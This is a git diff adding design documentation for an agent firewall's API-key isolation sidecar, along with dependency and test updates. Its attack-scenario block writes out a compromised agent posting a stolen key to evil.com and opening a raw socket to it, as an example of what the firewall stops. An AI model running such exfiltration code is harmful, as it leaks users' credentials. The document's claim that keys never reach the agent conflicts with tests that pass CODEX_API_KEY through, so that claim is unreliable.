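+# Hypothetical check from inside the agent container: no credentials are sent from here.
+# The sidecar listening on :10000 injects "Authorization: Bearer <real key>" for OpenAI;
+# the sidecar listening on :10001 injects "x-api-key: <real key>" for Anthropic.
+curl -s "$OPENAI_BASE_URL/v1/models"
+curl -s "$ANTHROPIC_BASE_URL/v1/models" -H "anthropic-version: 2023-06-01"
+```
+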
+## Architecture Components
+
+AWF uses a **3-container architecture** when API proxy mode is enabled:
+
+1. **Squid Proxy Container** (`172.30.0.10`) - L7 HTTP/HTTPS domain filtering
+2. **API Proxy Sidecar Container** (`172.30.0.30`) - Credential injection and isolation
+3. **Agent Execution Container** (`172.30.0.20`) - User command execution environment
+
+```
++----------------------------------------------------------+
+| HOST MACHINE                                              |
+|                                                           |
+| AWF CLI reads environment:                                |
+|   - ANTHROPIC_API_KEY=sk-ant-...                          |
+|   - OPENAI_API_KEY=sk-...                                 |
+|                                                           |
+| Passes keys only to api-proxy container                   |
++--------------------+-------------------------------------+
+                     |
+        +------------+-----------------------------------+
+        |                                                |
+        v                                                v
++----------------------------------+  +----------------------------------+
+| API Proxy Container              |  | Agent Container                  |
+| 172.30.0.30                      |  | 172.30.0.20                      |
+|                                  |  |                                  |
+| Environment:                     |  | Environment:                     |
+|  ✓ OPENAI_API_KEY=sk-...         |  |  ✗ No ANTHROPIC_API_KEY          |
+|  ✓ ANTHROPIC_API_KEY=sk-ant-...  |  |  ✗ No OPENAI_API_KEY             |
+|  ✓ HTTP_PROXY=172.30.0.10:3128   |  |  ✓ ANTHROPIC_BASE_URL=           |
+|  ✓ HTTPS_PROXY=172.30.0.10:3128  |  |      http://172.30.0.30:10001    |
+|                                  |  |  ✓ OPENAI_BASE_URL=              |
+| Ports:                           |  |      http://172.30.0.30:10000    |
+|  - 10000 (OpenAI proxy)  <-------|  |  ✓ GITHUB_TOKEN=ghp_...          |
+|  - 10001 (Anthropic proxy)       |  |    (protected by one-shot-token) |
+|                                  |  |                                  |
+| Injects auth headers:            |  | User command execution:          |
+|  - x-api-key: sk-ant-...         |  |  claude-code, copilot, etc.      |
+|  - Authorization: Bearer sk-...  |  +----------------------------------+
++----------------+-----------------+
+                 |
+                 v
++----------------------------------+
+| Squid Proxy Container            |
+| 172.30.0.10:3128                 |
+|                                  |
+| Domain whitelist enforcement:    |
+|  ✓ api.anthropic.com             |
+|  ✓ api.openai.com                |
+|  ✗ *.exfiltration.com (blocked)  |
+|                                  |
++----------------+-----------------+
+                 |
+                 v
+            Internet (api.anthropic.com)
+```
+
+## Token Flow: Step-by-Step
+
+### 1. Token Sources and Initial Handling
+
+**Location:** `src/cli.ts:988-989`
+
+When AWF is invoked with `--enable-api-proxy`:
+
+```bash
+export ANTHROPIC_API_KEY="sk-ant-..."
+export OPENAI_API_KEY="sk-..."
+
+awf --enable-api-proxy --allow-domains api.anthropic.com \
+ "claude-code --prompt 'write hello world'"
+```
+
+The CLI reads these API keys from the **host environment** at startup.
+
+### 2. Docker Compose Configuration
+
+**Location:** `src/docker-manager.ts:922-978`
+
+AWF generates a Docker Compose configuration with three services:
+
+#### API Proxy Service Configuration
+
+```yaml
+api-proxy:
+ environment:
+ # API keys passed ONLY to this container
+ - ANTHROPIC_API_KEY=sk-ant-...
+ - OPENAI_API_KEY=sk-...
+ # Routes all traffic through Squid
+ - HTTP_PROXY=http://172.30.0.10:3128
+ - HTTPS_PROXY=http://172.30.0.10:3128
+ networks:
+ awf-net:
+ ipv4_address: 172.30.0.30
+```
+
+#### Agent Service Configuration
+
+```yaml
+agent:
+ environment:
+ # NO API KEYS - only base URLs pointing to api-proxy
+ - ANTHROPIC_BASE_URL=http://172.30.0.30:10001
+ - OPENAI_BASE_URL=http://172.30.0.30:10000
+ # GitHub token for MCP servers (protected separately)
+ - GITHUB_TOKEN=ghp_...
+ networks:
+ awf-net:
+ ipv4_address: 172.30.0.20
+```
+
+**Key Security Decision:** API keys are **intentionally excluded** from the agent container environment (see lines 323-331, 404, and 413-417 in `docker-manager.ts`).
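+
+A condensed TypeScript sketch of that exclusion (the real set in `generateDockerCompose()` also contains sudo metadata and other host-only variables; the function name here is illustrative):
+
+```typescript
+// Variables that are never copied into the agent service's environment.
+function excludedAgentEnvVars(enableApiProxy: boolean): Set<string> {
+  const excluded = new Set<string>(['SUDO_USER', 'SUDO_UID', 'SUDO_GID']);
+  if (enableApiProxy) {
+    // Held only by the api-proxy sidecar; the agent gets *_BASE_URL redirects instead.
+    excluded.add('OPENAI_API_KEY');
+    excluded.add('OPENAI_KEY');
+    excluded.add('ANTHROPIC_API_KEY');
+    excluded.add('CLAUDE_API_KEY');
+  }
+  return excluded;
+}
+```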
+
+### 3. API Proxy: Credential Injection Layer
+
+**Location:** `containers/api-proxy/server.js`
+
+The api-proxy container runs two HTTP servers:
+
+#### Port 10000: OpenAI Proxy
+
+```javascript
+// Simplified excerpt of containers/api-proxy/server.js
+const http = require('http');
+const https = require('https');
+const { HttpsProxyAgent } = require('https-proxy-agent');
+
+// Read API key from environment (line 46)
+const OPENAI_API_KEY = process.env.OPENAI_API_KEY;
+
+// Create proxy agent to route through Squid (lines 34-38)
+const proxyAgent = new HttpsProxyAgent({
+  host: process.env.SQUID_PROXY_HOST,
+  port: parseInt(process.env.SQUID_PROXY_PORT, 10),
+});
+
+// Handle incoming requests from the agent (lines 175-184)
+http.createServer((clientReq, clientRes) => {
+  // Strip any client-supplied auth headers (security)
+  delete clientReq.headers['authorization'];
+
+  // Inject the actual API key
+  const headers = {
+    ...clientReq.headers,
+    'Authorization': `Bearer ${OPENAI_API_KEY}`,
+    'Host': 'api.openai.com'
+  };
+
+  // Forward to the real API through Squid and relay the response back
+  const upstream = https.request({
+    hostname: 'api.openai.com',
+    method: clientReq.method,
+    path: clientReq.url,
+    headers: headers,
+    agent: proxyAgent  // Routes through Squid
+  }, (apiRes) => {
+    clientRes.writeHead(apiRes.statusCode, apiRes.headers);
+    apiRes.pipe(clientRes);
+  });
+  clientReq.pipe(upstream);
+}).listen(10000);
+```
+
+#### Port 10001: Anthropic Proxy
+
+```javascript
+// Same file as above: http, https, and proxyAgent are shared with the OpenAI proxy
+// Read API key from environment (line 47)
+const ANTHROPIC_API_KEY = process.env.ANTHROPIC_API_KEY;
+
+// Handle incoming requests from the agent (lines 218-224)
+http.createServer((clientReq, clientRes) => {
+  // Strip any client-supplied auth headers (security)
+  delete clientReq.headers['x-api-key'];
+
+  // Inject the actual API key
+  const headers = {
+    ...clientReq.headers,
+    'x-api-key': ANTHROPIC_API_KEY,
+    'Host': 'api.anthropic.com'
+  };
+
+  // Forward to the real API through Squid and relay the response back
+  const upstream = https.request({
+    hostname: 'api.anthropic.com',
+    method: clientReq.method,
+    path: clientReq.url,
+    headers: headers,
+    agent: proxyAgent  // Routes through Squid
+  }, (apiRes) => {
+    clientRes.writeHead(apiRes.statusCode, apiRes.headers);
+    apiRes.pipe(clientRes);
+  });
+  clientReq.pipe(upstream);
+}).listen(10001);
+```
+
+**Security Feature:** The proxy strips any authentication headers sent by the agent (lines 23-36) and only uses the key from its own environment, so the upstream request always carries the sidecar's credentials rather than anything a compromised agent supplies.
+
+### 4. Agent Container: SDK Transparent Redirection
+
+**Location:** Agent container environment configuration
+
+The agent container sees these environment variables:
+
+```bash
+ANTHROPIC_BASE_URL=http://172.30.0.30:10001
+OPENAI_BASE_URL=http://172.30.0.30:10000
+```
+
+These are **standard environment variables** recognized by:
+- Anthropic Python SDK (`anthropic` package)
+- Anthropic TypeScript SDK (`@anthropic-ai/sdk`)
+- OpenAI Python SDK (`openai` package)
+- OpenAI Node.js SDK (`openai`)
+- Claude Code CLI
+- Codex CLI
+
+When the agent code makes an API call:
+
+**Example 1: Anthropic/Claude**
+
+```python
+# Example: Claude Code or custom agent using Anthropic SDK
+import anthropic
+
+client = anthropic.Anthropic()
+# SDK reads ANTHROPIC_BASE_URL from environment
+# Sends request to http://172.30.0.30:10001 instead of api.anthropic.com
+
+response = client.messages.create(
+    model="claude-sonnet-4",
+    max_tokens=1024,
+    messages=[{"role": "user", "content": "Hello"}]
+)
+```
+
+**Example 2: OpenAI/Codex**
+
+```python
+# Example: Codex or custom agent using OpenAI SDK
+import openai
+
+client = openai.OpenAI()
+# SDK reads OPENAI_BASE_URL from environment
+# Sends request to http://172.30.0.30:10000 instead of api.openai.com
+
+response = client.chat.completions.create(
+ model="gpt-4",
+ messages=[{"role": "user", "content": "Hello"}]
+)
+```
+
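+**Example 3 (sketch): Anthropic TypeScript SDK**
+
+The Node SDKs listed above behave the same way. Because the sidecar strips and replaces any client-supplied credentials, a placeholder key is sufficient inside the agent container:
+
+```typescript
+import Anthropic from '@anthropic-ai/sdk';
+
+// The SDK picks up ANTHROPIC_BASE_URL from the environment, so this request goes
+// to the api-proxy sidecar; the placeholder key is stripped and replaced there.
+const client = new Anthropic({ apiKey: 'placeholder' });
+
+const message = await client.messages.create({
+  model: 'claude-sonnet-4',
+  max_tokens: 256,
+  messages: [{ role: 'user', content: 'Hello' }],
+});
+```
+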
+The SDKs **automatically use the base URL** without requiring any code changes. The agent thinks it's talking to the real API, but requests are routed through the secure api-proxy sidecar.
+
+### 5. Network Routing: iptables Rules
+
+**Location:** `containers/agent/setup-iptables.sh:131-134, 275`
+
+Special iptables rules ensure proper routing:
+
+```bash
+# Allow direct access to api-proxy (bypass normal proxy redirection)
+if [ -n "$AWF_API_PROXY_IP" ]; then
+ echo "[iptables] Allow traffic to API proxy sidecar (${AWF_API_PROXY_IP})..."
+ iptables -t nat -A OUTPUT -d "$AWF_API_PROXY_IP" -j RETURN
+fi
+
+# ... later ...
+
+# Accept TCP traffic to api-proxy
+iptables -A OUTPUT -p tcp -d "$AWF_API_PROXY_IP" -j ACCEPT
+```
+
+Without these rules, traffic to `172.30.0.30` would be redirected to Squid via NAT rules, creating a routing loop.
+
+**Traffic Flow for Anthropic/Claude:**
+
+1. Agent SDK makes HTTP request to `172.30.0.30:10001`
+2. iptables allows direct TCP connection (no redirection)
+3. API proxy receives request on port 10001
+4. API proxy injects `x-api-key: sk-ant-...` header
+5. API proxy forwards to `api.anthropic.com` via Squid (using `HttpsProxyAgent`)
+6. Squid enforces domain whitelist (only `api.anthropic.com` allowed)
+7. Squid forwards to real API endpoint
+8. Response flows back: API → Squid → api-proxy → agent
+
+**Traffic Flow for OpenAI/Codex:**
+
+1. Agent SDK makes HTTP request to `172.30.0.30:10000`
+2. iptables allows direct TCP connection (no redirection)
+3. API proxy receives request on port 10000
+4. API proxy injects `Authorization: Bearer sk-...` header
+5. API proxy forwards to `api.openai.com` via Squid (using `HttpsProxyAgent`)
+6. Squid enforces domain whitelist (only `api.openai.com` allowed)
+7. Squid forwards to real API endpoint
+8. Response flows back: API → Squid → api-proxy → agent
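+
+As a hypothetical sanity check (not part of the AWF codebase), the same path can be exercised directly from inside the agent container; the placeholder key below is stripped and replaced by the sidecar:
+
+```typescript
+// Runs inside the agent container: the request goes to the api-proxy sidecar,
+// which injects the real x-api-key and relays the call through Squid.
+const base = process.env.ANTHROPIC_BASE_URL ?? 'http://172.30.0.30:10001';
+
+async function ping(): Promise<void> {
+  const res = await fetch(`${base}/v1/messages`, {
+    method: 'POST',
+    headers: {
+      'content-type': 'application/json',
+      'anthropic-version': '2023-06-01',
+      'x-api-key': 'placeholder', // stripped and replaced by the sidecar
+    },
+    body: JSON.stringify({
+      model: 'claude-sonnet-4',
+      max_tokens: 32,
+      messages: [{ role: 'user', content: 'ping' }],
+    }),
+  });
+  console.log('proxied request status:', res.status);
+}
+
+ping();
+```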
+
+### 6. Squid Proxy: Domain Filtering
+
+**Location:** `src/squid-config.ts:462-465`
+
+When api-proxy is enabled, Squid configuration includes:
+
+```squid
+# Allow api-proxy ports
+acl Safe_ports port 10000
+acl Safe_ports port 10001
+
+# Allow api-proxy IP address (dst ACL for IP addresses)
+acl allowed_ips dst 172.30.0.30
+http_access allow allowed_ips
+
+# Allow API domains (dstdomain ACL for hostnames)
+acl allowed_domains dstdomain api.anthropic.com
+acl allowed_domains dstdomain api.openai.com
+http_access allow CONNECT allowed_domains
+```
+
+The api-proxy container's environment forces all outbound traffic through Squid:
+
+```yaml
+environment:
+ HTTP_PROXY: http://172.30.0.10:3128
+ HTTPS_PROXY: http://172.30.0.10:3128
+```
+
+Even if a compromised api-proxy container tried to connect to a malicious domain, Squid would block it.
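+
+A sketch of how these rules could be assembled (the actual generation lives in `src/squid-config.ts`; the function and parameter names here are illustrative):
+
+```typescript
+// Emits the api-proxy related ACL lines shown above.
+function apiProxySquidRules(apiProxyIp: string, allowedDomains: string[]): string {
+  return [
+    'acl Safe_ports port 10000',
+    'acl Safe_ports port 10001',
+    `acl allowed_ips dst ${apiProxyIp}`,
+    'http_access allow allowed_ips',
+    ...allowedDomains.map((domain) => `acl allowed_domains dstdomain ${domain}`),
+    'http_access allow CONNECT allowed_domains',
+  ].join('\n');
+}
+
+// e.g. apiProxySquidRules('172.30.0.30', ['api.anthropic.com', 'api.openai.com'])
+```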
+
+## Additional Token Protection Mechanisms
+
+### One-Shot Token Library
+
+**Location:** `containers/agent/one-shot-token/`
+
+While API keys don't exist in the agent container, other tokens (like `GITHUB_TOKEN`) do. AWF uses an LD_PRELOAD library to protect these:
+
+```c
+// Simplified sketch of the LD_PRELOAD interposer (helper functions elided)
+// Intercept getenv() calls
+char* getenv(const char* name) {
+    if (is_protected_token(name)) {
+        // First access: look up the real value, cache a copy, then remove it
+        // from the environment so /proc/self/environ no longer shows it
+        char* value = real_getenv(name);
+        if (value) {
+            cache_token(name, value);   // subsequent accesses are served from the cache
+            unsetenv(name);             // remove from the process environment
+        }
+        return value;
+    }
+    return real_getenv(name);
+}
+```
+
+**Protected tokens by default:**
+- `ANTHROPIC_API_KEY`, `CLAUDE_API_KEY` (though not passed to agent)
+- `OPENAI_API_KEY`, `OPENAI_KEY`
+- `GITHUB_TOKEN`, `GH_TOKEN`, `COPILOT_GITHUB_TOKEN`
+- `GITHUB_API_TOKEN`, `GITHUB_PAT`, `GH_ACCESS_TOKEN`
+- `CODEX_API_KEY`
+
+### Entrypoint Token Cleanup
+
+**Location:** `containers/agent/entrypoint.sh:145-176`
+
+The entrypoint (PID 1) unsets sensitive tokens from its own environment after a 5-second grace period:
+
+```bash
+unset_sensitive_tokens() {
+ local SENSITIVE_TOKENS=(
+ "ANTHROPIC_API_KEY" "CLAUDE_API_KEY" "CLAUDE_CODE_OAUTH_TOKEN"
+ "OPENAI_API_KEY" "OPENAI_KEY"
+ "GITHUB_TOKEN" "GH_TOKEN" "COPILOT_GITHUB_TOKEN"
+ "GITHUB_API_TOKEN" "GITHUB_PAT" "GH_ACCESS_TOKEN"
+ "GITHUB_PERSONAL_ACCESS_TOKEN"
+ "CODEX_API_KEY"
+ )
+
+ for token in "${SENSITIVE_TOKENS[@]}"; do
+ if [ -n "${!token}" ]; then
+ unset "$token"
+ echo "[entrypoint] Unset $token from /proc/1/environ" >&2
+ fi
+ done
+}
+
+# Give child processes 5 seconds to start and read the tokens they need,
+# then scrub the tokens from the entrypoint's own environment
+sleep 5
+unset_sensitive_tokens
+```
+
+This prevents tokens from being visible in `/proc/1/environ` after the agent starts.
+
+## Security Properties
+
+### Credential Isolation
+
+**Primary Security Guarantee:** API keys **never exist** in the agent container environment.
+
+- Agent code cannot read API keys via `getenv()` or `os.getenv()`
+- API keys are not visible in `/proc/self/environ` or `/proc/*/environ`
+- Compromised agent code cannot exfiltrate API keys (they don't exist)
+- Only the api-proxy container has access to API keys
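+
+This can be spot-checked from inside the agent container with a few lines of Node.js (illustrative; assumes `node` is available in the agent image):
+
+```typescript
+// Inside the agent container the keys simply do not exist:
+console.log(process.env.ANTHROPIC_API_KEY);  // undefined
+console.log(process.env.OPENAI_API_KEY);     // undefined
+console.log(process.env.ANTHROPIC_BASE_URL); // http://172.30.0.30:10001
+```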
+
+### Network Isolation
+
+**Defense in Depth:**
+
+1. **Layer 1:** Agent cannot make direct internet connections (iptables blocks non-whitelisted traffic)
+2. **Layer 2:** Agent can only reach api-proxy IP (`172.30.0.30`) for API calls
+3. **Layer 3:** API proxy routes ALL traffic through Squid (enforced via `HTTP_PROXY` env)
+4. **Layer 4:** Squid enforces domain whitelist (only `api.anthropic.com`, `api.openai.com`)
+5. **Layer 5:** Host-level iptables provide additional egress control
+
+**Attack Scenario: What if the agent tries to bypass the proxy?**
+
+```python
+# Compromised agent tries to exfiltrate API key
+import os
+import requests
+
+# Attempt 1: Try to read API key
+api_key = os.getenv("ANTHROPIC_API_KEY")
+# Result: None (key doesn't exist in agent environment)
+
+# Attempt 2: Try to connect to malicious domain
+requests.post("https://evil.com/exfiltrate", data={"key": api_key})
+# Result: iptables blocks connection (evil.com not in whitelist)
+
+# Attempt 3: Try to bypass Squid
+import socket
+sock = socket.socket()
+sock.connect(("evil.com", 443))
+# Result: iptables blocks connection (must go through Squid)
+```
+
+All attempts fail due to the multi-layered defense.
+
+### Capability Restrictions
+
+**API Proxy Container:**
+
+```yaml
+security_opt:
+ - no-new-privileges:true
+cap_drop:
+ - ALL
+mem_limit: 512m
+pids_limit: 100
+```
+
+Even if exploited, the api-proxy runs with no elevated privileges and only limited resources.
+
+**Agent Container:**
+
+- Starts with `CAP_NET_ADMIN` for iptables setup
+- Drops `CAP_NET_ADMIN` via `capsh --drop=cap_net_admin` before executing user command
+- Prevents malicious code from modifying firewall rules
+
+## Configuration Requirements
+
+### Enabling API Proxy Mode
+
+**Example 1: Using with Claude Code**
+
+```bash
+# Export Anthropic API key on host
+export ANTHROPIC_API_KEY="sk-ant-api03-..."
+
+# Run AWF with --enable-api-proxy flag
+awf --enable-api-proxy \
+ --allow-domains api.anthropic.com \
+ "claude-code --prompt 'Hello world'"
+```
+
+**Example 2: Using with Codex**
+
+```bash
+# Export OpenAI API key on host
+export OPENAI_API_KEY="sk-..."
+
+# Run AWF with --enable-api-proxy flag
+awf --enable-api-proxy \
+ --allow-domains api.openai.com \
+ "codex --prompt 'Hello world'"
+```
+
+**Example 3: Using both providers**
+
+```bash
+# Export both API keys on host
+export ANTHROPIC_API_KEY="sk-ant-api03-..."
+export OPENAI_API_KEY="sk-..."
+
+# Run AWF with --enable-api-proxy flag, allowing both domains
+awf --enable-api-proxy \
+ --allow-domains api.anthropic.com,api.openai.com \
+ "your-multi-llm-agent"
+```
+
+### Domain Whitelist
+
+When using api-proxy, you must allow the API domains:
+
+```bash
+--allow-domains api.anthropic.com,api.openai.com
+```
+
+Without these, Squid will block the api-proxy's outbound connections.
+
+### NO_PROXY Configuration
+
+**Location:** `src/docker-manager.ts:969`
+
+The agent container's `NO_PROXY` variable includes:
+
+```bash
+NO_PROXY=127.0.0.1,localhost,172.30.0.30,172.30.0.0/16,api-proxy
+```
+
+This ensures:
+- Local MCP servers (stdio-based) can communicate via localhost
+- Agent can reach api-proxy directly without going through a proxy
+- Container-to-container communication works properly
+
+## Comparison: With vs Without API Proxy
+
+### Without API Proxy (Direct Authentication)
+
+```
+┌───────────────────────────────────────────┐
+│ Agent Container                           │
+│                                           │
+│ Environment:                              │
+│  - ANTHROPIC_API_KEY=sk-ant-... (VISIBLE) │
+│                                           │
+│ Risk: Token visible in /proc/environ      │
+└─────────────────────┬─────────────────────┘
+                      │
+                      ▼
+                 Squid Proxy
+                      │
+                      ▼
+              api.anthropic.com
+```
+
+**Security Risk:** If the agent is compromised, the attacker can read the API key from environment variables.
+
+### With API Proxy (Credential Isolation)
+
+```
+┌─────────────────────────┐      ┌──────────────────────────────────┐
+│ Agent Container         │─────▶│ API Proxy                        │
+│                         │      │                                  │
+│ Environment:            │      │ Environment:                     │
+│  - No API key           │      │  - ANTHROPIC_API_KEY=sk-ant-...  │
+│  - BASE_URL=172.30.0.30 │      │    (ISOLATED)                    │
+└─────────────────────────┘      └────────────────┬─────────────────┘
+                                                  │
+                                                  ▼
+                                             Squid Proxy
+                                                  │
+                                                  ▼
+                                          api.anthropic.com
+```
+
+**Security Improvement:** Compromised agent cannot access API keys (they don't exist in agent environment).
+
+## Key Files Reference
+
+| File | Purpose |
+|------|---------|
+| `src/cli.ts:988-989` | CLI reads API keys from host environment |
+| `src/docker-manager.ts:922-978` | Docker Compose generation, token routing logic |
+| `containers/api-proxy/server.js` | API proxy implementation (credential injection) |
+| `containers/agent/setup-iptables.sh:131-134, 275` | iptables rules for api-proxy routing |
+| `containers/agent/entrypoint.sh:145-176` | Entrypoint token cleanup |
+| `containers/agent/one-shot-token/` | LD_PRELOAD library for token protection |
+| `src/squid-config.ts:462-465` | Squid Safe_ports configuration for api-proxy |
+| `docs/api-proxy-sidecar.md` | User-facing API proxy documentation |
+| `docs/token-unsetting-fix.md` | Token cleanup implementation details |
+
+## Summary
+
+AWF implements **credential isolation** through architectural separation:
+
+1. **API keys live only in the api-proxy container** (never in the agent environment)
+2. **Agent uses standard SDK environment variables** (`*_BASE_URL`) to redirect traffic
+3. **API proxy injects credentials** and routes through Squid
+4. **Squid enforces domain whitelist** (only allowed API domains)
+5. **iptables enforces network isolation** (agent cannot bypass proxy)
+6. **Multiple token cleanup mechanisms** protect other credentials (GitHub tokens, etc.)
+
+This architecture provides **transparent operation** (SDKs work without code changes) while maintaining **strong security** (compromised agent cannot steal API keys).
diff --git a/package-lock.json b/package-lock.json
index 72a685fd..e8b1dca4 100644
--- a/package-lock.json
+++ b/package-lock.json
@@ -27,7 +27,7 @@
"@types/glob": "^9.0.0",
"@types/jest": "^30.0.0",
"@types/js-yaml": "^4.0.5",
- "@types/node": "^25.2.2",
+ "@types/node": "^25.2.3",
"@typescript-eslint/eslint-plugin": "^8.55.0",
"@typescript-eslint/parser": "^8.55.0",
"babel-jest": "^30.2.0",
diff --git a/package.json b/package.json
index 7e3bd725..c6cfee76 100644
--- a/package.json
+++ b/package.json
@@ -51,24 +51,24 @@
"@babel/preset-env": "^7.29.0",
"@commitlint/cli": "^20.4.1",
"@commitlint/config-conventional": "^20.4.1",
+ "@eslint/compat": "^2.0.0",
+ "@eslint/js": "^10.0.0",
"@types/glob": "^9.0.0",
"@types/jest": "^30.0.0",
"@types/js-yaml": "^4.0.5",
- "@types/node": "^25.2.2",
- "@eslint/compat": "^2.0.0",
- "@eslint/js": "^10.0.0",
+ "@types/node": "^25.2.3",
"@typescript-eslint/eslint-plugin": "^8.55.0",
"@typescript-eslint/parser": "^8.55.0",
- "globals": "^17.0.0",
- "typescript-eslint": "^8.0.0",
"babel-jest": "^30.2.0",
"eslint": "^10.0.0",
"eslint-plugin-security": "^3.0.1",
"glob": "^13.0.1",
+ "globals": "^17.0.0",
"husky": "^9.1.7",
"jest": "^30.2.0",
"ts-jest": "^29.4.6",
- "typescript": "^5.0.0"
+ "typescript": "^5.0.0",
+ "typescript-eslint": "^8.0.0"
},
"engines": {
"node": ">=20.12.0"
diff --git a/src/docker-manager.test.ts b/src/docker-manager.test.ts
index 0b91f7f3..ae42c01d 100644
--- a/src/docker-manager.test.ts
+++ b/src/docker-manager.test.ts
@@ -1545,12 +1545,13 @@ describe('docker-manager', () => {
expect(dependsOn['api-proxy'].condition).toBe('service_healthy');
});
- it('should set OPENAI_BASE_URL in agent when OpenAI key is provided', () => {
+ it('should not set OPENAI_BASE_URL in agent when OpenAI key is provided (temporarily disabled)', () => {
const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-key' };
const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
const agent = result.services.agent;
const env = agent.environment as Record<string, string>;
- expect(env.OPENAI_BASE_URL).toBe('http://172.30.0.30:10000');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
});
it('should configure HTTP_PROXY and HTTPS_PROXY in api-proxy to route through Squid', () => {
@@ -1568,15 +1569,20 @@ describe('docker-manager', () => {
const agent = result.services.agent;
const env = agent.environment as Record<string, string>;
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
});
- it('should set both BASE_URL variables when both keys are provided', () => {
+ it('should only set ANTHROPIC_BASE_URL when both keys are provided (OPENAI_BASE_URL temporarily disabled)', () => {
const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-openai-key', anthropicApiKey: 'sk-ant-test-key' };
const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
const agent = result.services.agent;
const env = agent.environment as Record<string, string>;
- expect(env.OPENAI_BASE_URL).toBe('http://172.30.0.30:10000');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
});
it('should not set OPENAI_BASE_URL in agent when only Anthropic key is provided', () => {
@@ -1586,15 +1592,18 @@ describe('docker-manager', () => {
const env = agent.environment as Record<string, string>;
expect(env.OPENAI_BASE_URL).toBeUndefined();
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
});
- it('should not set ANTHROPIC_BASE_URL in agent when only OpenAI key is provided', () => {
+ it('should not set ANTHROPIC_BASE_URL or OPENAI_BASE_URL in agent when only OpenAI key is provided (OPENAI_BASE_URL temporarily disabled)', () => {
const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-key' };
const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
const agent = result.services.agent;
const env = agent.environment as Record<string, string>;
expect(env.ANTHROPIC_BASE_URL).toBeUndefined();
- expect(env.OPENAI_BASE_URL).toBe('http://172.30.0.30:10000');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
});
it('should set AWF_API_PROXY_IP in agent environment', () => {
@@ -1614,6 +1623,22 @@ describe('docker-manager', () => {
expect(env.no_proxy).toContain('172.30.0.30');
});
+ it('should set CLAUDE_CODE_API_KEY_HELPER when Anthropic key is provided', () => {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, anthropicApiKey: 'sk-ant-test-key' };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+    const env = agent.environment as Record<string, string>;
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBe('/usr/local/bin/get-claude-key.sh');
+ });
+
+ it('should not set CLAUDE_CODE_API_KEY_HELPER when only OpenAI key is provided', () => {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test-key' };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+    const env = agent.environment as Record<string, string>;
+ expect(env.CLAUDE_CODE_API_KEY_HELPER).toBeUndefined();
+ });
+
it('should not leak ANTHROPIC_API_KEY to agent when api-proxy is enabled', () => {
// Simulate the key being in process.env (as it would be in real usage)
const origKey = process.env.ANTHROPIC_API_KEY;
@@ -1627,6 +1652,97 @@ describe('docker-manager', () => {
expect(env.ANTHROPIC_API_KEY).toBeUndefined();
// Agent should have the BASE_URL to reach the sidecar instead
expect(env.ANTHROPIC_BASE_URL).toBe('http://172.30.0.30:10001');
+ // Agent should have placeholder token for Claude Code compatibility
+ expect(env.ANTHROPIC_AUTH_TOKEN).toBe('placeholder-token-for-credential-isolation');
+ } finally {
+ if (origKey !== undefined) {
+ process.env.ANTHROPIC_API_KEY = origKey;
+ } else {
+ delete process.env.ANTHROPIC_API_KEY;
+ }
+ }
+ });
+
+ it('should not leak OPENAI_API_KEY to agent when api-proxy is enabled', () => {
+ // Simulate the key being in process.env (as it would be in real usage)
+ const origKey = process.env.OPENAI_API_KEY;
+ process.env.OPENAI_API_KEY = 'sk-secret-key';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-secret-key' };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+      const env = agent.environment as Record<string, string>;
+      // Agent should NOT have the raw API key - only the sidecar gets it
+ expect(env.OPENAI_API_KEY).toBeUndefined();
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
+ } finally {
+ if (origKey !== undefined) {
+ process.env.OPENAI_API_KEY = origKey;
+ } else {
+ delete process.env.OPENAI_API_KEY;
+ }
+ }
+ });
+
+ it('should pass CODEX_API_KEY to agent even when api-proxy is enabled with envAll', () => {
+ // Simulate the key being in process.env AND envAll enabled
+ // CODEX_API_KEY is intentionally passed through (unlike other keys) for Codex agent compatibility
+ const origKey = process.env.CODEX_API_KEY;
+ process.env.CODEX_API_KEY = 'sk-codex-secret';
+ try {
+ const configWithProxy = { ...mockConfig, enableApiProxy: true, openaiApiKey: 'sk-test', envAll: true };
+ const result = generateDockerCompose(configWithProxy, mockNetworkConfigWithProxy);
+ const agent = result.services.agent;
+      const env = agent.environment as Record<string, string>;
+ // CODEX_API_KEY is intentionally passed to agent for Codex compatibility
+ expect(env.CODEX_API_KEY).toBe('sk-codex-secret');
+ // OPENAI_BASE_URL temporarily disabled for Codex - will be re-enabled in future
+ expect(env.OPENAI_BASE_URL).toBeUndefined();
